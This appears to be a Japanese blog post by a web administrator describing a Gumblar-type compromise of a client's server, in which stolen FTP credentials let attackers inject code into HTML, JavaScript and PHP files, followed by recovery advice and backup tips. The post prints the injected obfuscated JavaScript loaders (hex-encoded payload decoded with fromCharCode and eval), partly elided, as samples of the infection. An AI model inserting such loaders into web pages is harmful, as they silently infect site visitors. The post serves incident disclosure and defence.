WEBサイト改ざん被害

メルです。

かなり仕事を休んでしまったので
「さぁ、仕事!仕事!」と思いきや、
管理しているある企業のサーバーに
不振なFTPアクセスが・・・

アクセス元は、

など・・・。

これはやばいのでは?と思いながら
サーバーの中身を見ると、
なんと大量のファイルが改ざんにあっているではありませんか。

改竄されたページにアクセスすると訪問者のパソコンが
感染し、被害が広まると言うオマケ付き。

改竄されたファイルは、HTMLファイル、JavaScriptファイル、
一部PHPファイルで、<!–81a338–>、/*81a338*/から始まる
JavaScript、iframe などの埋め込みが特徴。

他にも81a338の代わりに0c0896や、ded509などの6桁の
英数字のものもあるようです。

状況から見て、
これは最近非常に被害が増えているパターンで
ガンブラーなどのウイルスやスパイウエアに感染し、
パソコンからFTP情報を搾取され、改竄されている
可能性が高い。

 

 

流石にこれはまずいので、
サイトを閉鎖し、クライアント企業に連絡。

全てのパソコンのウイルスチェックをしてもらい、
サーバー、FTPへのアクセス制限を行い、
全てのパスワードの変更と共に復旧作業に取り掛かることに。

因みに改ざん被害にあったファイルには以下のコードが追加されていました。

 

改ざんされたHTMLファイル

<!--81a338--><script type="text/javascript" language="javascript" >gakqf="s"+"p"+"li"+"t";srkjb=window;fpr="dy";txm=document;rcigwm="0x";kguirj=(5-3-1);try{++(txm.body)}catch(yymj){jpi=false;try{}catch(vji){jpi=21;}
if(1){crqv="17:5d:6c:65:5a:6b:60:66:65:17:6f:58:5c:27:30:1f:20:17:72:4:1:17:6d:58:69:17:6a:6b:58:6b:60:5a:34:1e:58:61:58:6f:1e:32:4:1:17:6d:58:69:17:5a:66:65:6b:69:66:63:63:5c:69:34:1e:60:65:5b:5c:6f:25:67:5f:67:1e:32:4:1:17:6d:58:69:17:6f:58:5c:17:34:17:5b:66:5a:6c
     ・
     ・中略
     ・
5c:5b:56:6c:68:1e:23:17:1e:2c:2c:1e:23:17:1e:28:1e:23:17:1e:26:1e:20:32:4:1:4:1:6f:58:5c:27:30:1f:20:32:4:1:74:4:1:74"[gakqf](":");}srkjb=crqv;cub=[];for(yghxc=22-20-2;-yghxc+1384!=0;yghxc+=1){mfeuzr=yghxc;if((0x19==031))cub+=String["fromCharCode"](eval(rcigwm+srkjb[1*mfeuzr])+0xa-kguirj);}rzosnt=eval;rzosnt(cub)}</script><!--/81a338-->

 

改ざんされたJavaScriptファイル

/*81a338*/
ragir="s"+"p"+"li"+"t";negu=window;zwh="dy";vqpoo=document;rauffm="0x";blye=(5-3-1);try{++(vqpoo.body)}catch(xdomas){jioz=false;try{}catch(dhncm){jioz=21;}
if(1){przkl="17:5d:6c:65:5a:6b:60:66:65:17:60:5d:27:30:1f:20:17:72:4:1:17:6d:58:69:17:6a:6b:58:6b:60:5a:34:1e:58:61:58:6f:1e:32:4:1:17:6d:58:69:17:5a:66:65:6b:
     ・
     ・中略
     ・
2c:1e:23:17:1e:28:1e:23:17:1e:26:1e:20:32:4:1:4:1:60:5d:27:30:1f:20:32:4:1:74:4:1:74"[ragir](":");}negu=przkl;ljy=[];for(cahkv=22-20-2;-cahkv+1374!=0;cahkv+=1){lufim=cahkv;if((0x19==031))ljy+=String["fromCharCode"](eval(rauffm+negu[1*lufim])+0xa-blye);}klc=eval;klc(ljy)}
/*/81a338*/

 

改ざんされたPHPファイル

#81a338#
if(empty($qk)) {
$qk = "<script type=\"text/javascript\" language=\"javascript\" >gakqf=\"s\"+\"p\"+\"li\"+\"t\";srkjb=window;fpr=\"dy\";txm=document;rcigwm=\"0x\";kguirj=(5-3-1);try{++(txm.body)}catch(yymj){jpi=false;try{}catch(vji){jpi=21;}
if(1){crqv=\"17:5d:6c:65:5a:6b:60:66:65:17:6f:58:5c:27:30:1f:20:17:72:4:1:17:6d:58:69:17:6a:6b:58:6b:60:5a:34:1e:58:61:58:6f:1e:32:4:1:17:6d:58:69:17:5a:66:65:
     ・
     ・中略
     ・
4:1:74:4:1:74\"[gakqf](\":\");}srkjb=crqv;cub=[];for(yghxc=22-20-2;-yghxc+1384!=0;yghxc+=1){mfeuzr=yghxc;if((0x19==031))cub+=String[\"fromCharCode\"](eval(rcigwm+srkjb[1*mfeuzr])+0xa-kguirj);}rzosnt=eval;rzosnt(cub)}</script>";
echo $qk;
}
#/81a338#

 

このサーバーには月商300万円のネットショップが入っていたので
スピード勝負。

結局なんだかんだで復旧までに丸1日かかってしまいましたが(笑

最近、CMSなどの脆弱性をついた攻撃や、
今回のようにパソコンから情報を搾取しての攻撃など、
非常に被害が広まっています。

またWEBサイトにアクセスするだけでも感染するものも
多数あります。

どこか遠い世界の出来事ではなく、
誰もがいつでも感染する可能性があります。

パソコンのセキュリティはしっかりと導入し、
まめにスキャンして、皆さんも気をつけて下さい。

 

 

— 10/3追記 —

 

このタイプの被害にあった場合の対処法は、
81a338で入れ子になっている部分の記述を削除するしかありません。

被害にあっている事に気付くのが遅いと、
数百から数千ものファイルが書き換えられているため、
手動でファイルを開いて削除していたら大変です。
日頃からサーバー内の全ファイルのバックアップを
まめに取っておく事をお勧めします。

バックアップさえあれば、FTPで一括上書きアップロードで対応できます。

 

 

この投稿は役に立ちましたか? 役に立った 役に立たなかった

 

ネットビジネス速報メールマガジン

 

メルのネットビジネス速報では、悪質高額塾などの被害が拡大しないように
新しい悪質販売者の情報が入り次第、速報でお伝えいたします。

Dreamweaver、Fireworks、PhotoshopなどのTipsやチュートリアルの紹介、
最新SEO情報、その他ネットビジネスに関する情報をいち早く配信しています。

お名前(必須)
メールアドレス(必須)

One Response to “WEBサイト改ざん被害”

  1. […] これは前回、WEBサイト改ざん被害の記事でも書きかましたが、 管理しているパソコンからFTPのパスワードを抜き取られて改竄されます。 […]

記事「WEBサイト改ざん被害」にコメントを残す

*

サブコンテンツ

危険な高額塾

タグ

株式会社A-ブログレス コピーボタン やしろひろたみ moza アイコン ライオンアフィリエイト ウインドウ 伊藤 虎太郎 ロリポップ Windows 7 ブロック 与沢翼 FTP CS5 立体 ぼかし クロスアフィリエイト RMT Youtube getElementById 大園式転売塾 パズル 石井匠 日本語入力変換ソフト 蝶乃舞 ネットビジネス 特定のメールアドレス アフィリエイト レビュー 出店料 株式会社SRシステム インターネット 既得権益 背景 バックアップ バイマ ブラウザ クラック 量産 マニュアル EC HTML4.0 RSS デスクトップ トラフィック 表示 不正送信 画像 Extension Manager ビジネス JavaScript BBIZ アドセンス 自己アフィリエイト CGI 久積篤史 関根義光 不労所得の神 タイガーウイング 詐欺 force puzzle 管理画面 大園転売塾 小笠原健一 YouTube Maniax 2017 ソースコード Google Maps ECサイト 山下 document.all クラウド変換 高速ゲーム エキスパートメール ツール レタープレス スマホ バイドゥー 株式会社Free Agent Style BUYMA 滑らか スムーズ ウイルス ネットゲーム 秒速で1億円稼ぐ男 ファビコン もざ スカイプ ネットビジネス大全集 android ライン system 短縮URLツール Firefox 固定ページ Google Maps API やしろ塾 レンタルサーバー MT ブラシ 三橋美仁 情報商材 村上省吾 新井浩 高額塾 フレンドシップメール SyntaxHighlighter アレックス SKナレッジ DOCTYPE Line Windows インターネットエクスプローラー 登録禁止 .htaccess クリックランキング tool 掲示板 マルウエア getElementByTagName 短縮URL 副業術 SEO レイアウト崩れ ヤフオク ムーバブルタイプ ボタン WEB 関根塾 到達率 タスクバー 大西良幸 伊藤塾 プロファイル IP ソフト IE XHTML 伊藤 歩 ユーチューブマニアクス2017 RSS Includes Pages テーマ エディタ MovableTYpe IBS 賢威 自己アフィリ google アンダーグラウンドアフィリエイトクラブ 切り抜き 改ざん Thunderbird ネットガレージ ランキング 定型文 MasterCollection 株式会社ニュース ワードプレス アレックス式ネオせどりスクール wp-login.php twitter リンクシェイカー アクセス制限 KMS認証 PHP 改竄 ツイッター Ban Hammer 無料 ざくざく君 ブラクラ 池田純矢 音量アイコン せどり 放射線 加工 postpost ヤフーショッピング 権利収入 @PAGES インペリアルゴールド explorer 優先順位 office html functions.php 詐欺組織 ブルートフォースアタック 個人情報流出 管理ツール 配布 Baidu 不正アクセス 比較 プロモーション 流出 ping送信 復元 css 感染 インフォトップ 株式会社WINGOOD マイクロソフト ハート Diamond Affiliate Masters Program Chrome がら空きビジネス Adobe DTD フォローマティック ネットショップ LinkShaker ソース 株式会社バンザイ 自動化 ping アフィ匠 クラウド入力機能 Wordpress Content Slide 北川 雅嗣 ライブチャット サイト改ざん Newpost Catch トレンドキーワード 81a338 iphone 特権ビジネス Cash on Wordpress 球体 アクセスアップ 個人情報 ネオヒルズアカデミー カスタマイズ 宮田麗花 KMSpico 百度 ヤフー ドメイン 上位表示 Login LockDown トレンドアフィリエイト バナー High Concept Marketing 原田真 グラデーション メルマガ配信システム エクスプローラー 脆弱性 ブロックポリシー 秀吉塾天下統一 CS6 SmoothScroll.js ネットビジネス最後の楽園 加藤 秀吉 大園麗花 切抜き メモ スクロール 自動 サンタ モザイク 申請金ビジネス エクスチェンジ Agency Business 与沢翼×蝶乃舞 インターネットビジネススクール PPC 無断送信 スタイルシート FireWorks wpXサーバー プラグイン wordpress シャンプー レイアウト 株式会社SRシステム followmatic WP アンダーグラウンドメソッド Yahoo 伊藤虎太郎 人物 無料オファー Favicon 中山秀人 セキュリティ 土屋ひろし Internet Explorer Tiger-Wing 転売大園塾 テンプレート

アーカイブ

エステトラブル

このページの先頭へ